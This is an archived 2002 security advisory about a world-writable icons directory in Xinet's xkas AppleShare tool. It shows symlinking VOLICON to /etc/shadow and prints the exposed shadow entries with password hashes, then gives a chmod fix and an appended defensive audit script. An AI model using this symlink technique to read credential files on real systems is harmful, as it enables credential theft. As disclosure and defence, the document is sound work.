Category:   Application (Generic)  >   Xkas
Vendors:   Xinet
Xinet's 'xkas' AppleShare Administration Tool Discloses Any Local File Contents to Local Users
SecurityTracker Alert ID:  1003379
SecurityTracker URL:  http://securitytracker.com/id/1003379
CVE Reference:   CAN-2002-0213   (Links to External Site)
Date:  Jan 28 2002
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   Hackerslab reported a vulnerability in Xinet's 'xkas' AppleShare administration tool for UNIX systems. A local user can view files on the server with root privileges.

It is reported that when a local user shares a directory, the application creates the '.HSResource' directory and the '.HSicon' file. The '.HSicon' file is reportedly created by copying the '/var/adm/appletalk/icons/VOLICON' file. The /var/adm/appletalk/icons directory is reported to be configured with 777 permissions (i.e., world read, write, and execute), allowing an unprivileged local user to replace the VOLICON file with a symbolic link to another critical file on the server. Then, when the AppleShare administrator invokes the 'xkas' application to share a directory, the application copies the linked file's contents into that directory's '.HSicon' file (instead of the intended VOLICON file). The newly created '.HSicon' file may be world readable.

Impact:   A local user may be able to view specific files on the server with root level privileges.
Solution:   No solution was available at the time of this entry.

The author of the report suggests, as a workaround, removing 'other' write permissions from the icons directory:

$ su -
# chmod o-w /var/adm/appletalk/icons

Vendor URL:  www.xinet.com/ (Links to External Site)
Cause:   Access control error, Configuration error
Underlying OS:   UNIX (SGI/IRIX), UNIX (Solaris - SunOS)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(SGI Issues Corrective Procedures) Re: Xinet's 'xkas' AppleShare Administration Tool Discloses Any Local File Contents to Local Users   (SGI Security Coordinator <agent99@sgi.com>)
SGI has issued a fix and has described corrective procedures.



 Source Message Contents

Date:  Mon, 28 Jan 2002 18:06:16 +0900 (KST)
Subject:  [ Hackerslab bug_paper ] Xkas application vulnerability


=============================================================================

       [ Hackerslab bug_paper ] Xkas application vulnerability

=============================================================================

File   : /usr/etc/appletalk/xkas application

SYSTEM : tested on IRIX 6.5

INFO :

Xkas is a server administration tool for AppleShare. Misconfiguration by the user with the root privilege could lead to a serious security vulnerability.

The .HSResource directory and .HSicon file are created when sharing a directory.
Creation of the .HSicon file is accomplished by copying the /var/adm/appletalk/icons/VOLICON file. A problem occurs during this process because the permission of the /var/adm/appletalk/icons directory is set to 777 (world-writable).
Link the wanted file with VOLICON like the following.

$ ls -al /var/adm/appletalk/icons
total 8
drwxrwxrwx    4 root     sys           57 Jan 25 03:12 .
drwxr-xr-x    6 root     sys         4096 Jan 24 16:05 ..
drwxr-xr-x    2 root  sys           9 Jan 25 03:12 .HSResource
lrwxr-xr-x    1 loveyou  user          11 Jan 25 03:05 VOLICON -> /etc/shadow

When the administrator uses the /usr/etc/appletalk/xkas directory to share the root directory, the following files are created in the root.
$ ls -al /
total 17099
drwxr-xr-x   37 root     sys          4096 Jan 25 03:30 .
drwxr-xr-x   37 root     sys          4096 Jan 25 03:30 ..
drwxr-xr-x    2 root     sys             9 Jan 25 03:30 .HSResource
-rw-r--r--    1 root     sys           786 Jan 25 03:30 .HSicon  
(etc..)

$ cat /.HSicon
root:y7floveyous30I:10908::::::
bin:yxaiFduxixe8s:11127::::::
uucp:*:11127::::::
sys:*:11127::::::
adm:*:11127::::::
loveyou:mXaa2jxi/ejY:10877::::::
(etc..)

SOLUTION :
Remove other-write permission, contact your vendor and get a patch.
$ su -
# chmod o-w /var/adm/appletalk/icons

==-------------------------------------------------------------------------==
       *********
   *    **   **    *
 *      **   **      *
*       *******       *                                          Kim Yong-Jun
 *      **   **      *                                 loveyou@hackerslab.org
   *    **   **    *                           [  http://www.hackerslab.org ]
       *********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------==
Yong-Jun
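As an added example that is not part of the Hackerslab advisory, the SecurityTracker entry, or Xinet's xkas, the following POSIX shell script audits the directory xkas copies VOLICON from for the two conditions the report depends on (a world-writable directory and a VOLICON that is a symbolic link rather than a regular file) and applies the chmod workaround the report suggests. The path /var/adm/appletalk/icons is the one the advisory names; the function names are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the advisory or from xkas): a defender-side
# audit of the directory xkas reads VOLICON from. It flags the two
# conditions the report relies on: the directory being world-writable,
# and VOLICON being a symbolic link instead of a regular file.
# Usage (path taken from the advisory): xkas_icons_audit /var/adm/appletalk/icons

xkas_icons_audit() {
    dir=$1
    status=0
    if [ ! -d "$dir" ]; then
        echo "ERROR: no such directory: $dir"
        return 2
    fi
    # Columns 1-10 of 'ls -ld' are the mode string; column 9 is the
    # 'other' write bit that lets any local user replace VOLICON.
    mode=$(ls -ld "$dir" | cut -c1-10)
    case $mode in
        ????????w?)
            echo "WARN: $dir is world-writable ($mode)"
            status=1 ;;
    esac
    # A symlink here is followed when xkas copies the file, so whatever
    # it points at ends up in the shared directory's .HSicon.
    if [ -L "$dir/VOLICON" ]; then
        echo "WARN: $dir/VOLICON is a symbolic link, not a regular file"
        status=1
    elif [ ! -f "$dir/VOLICON" ]; then
        echo "WARN: $dir/VOLICON is missing or not a regular file"
        status=1
    fi
    if [ "$status" -eq 0 ]; then
        echo "OK: $dir passes the xkas icon checks"
    fi
    return "$status"
}

# The advisory's workaround: drop 'other' write permission on the
# directory. On a real system this is run as root; it is a function here
# so it can be exercised against a scratch directory.
xkas_icons_harden() {
    chmod o-w "$1"
}
```

The audit returns 1 when either weakness is present, 2 when the directory does not exist, and 0 when the directory is not world-writable and VOLICON is a regular file.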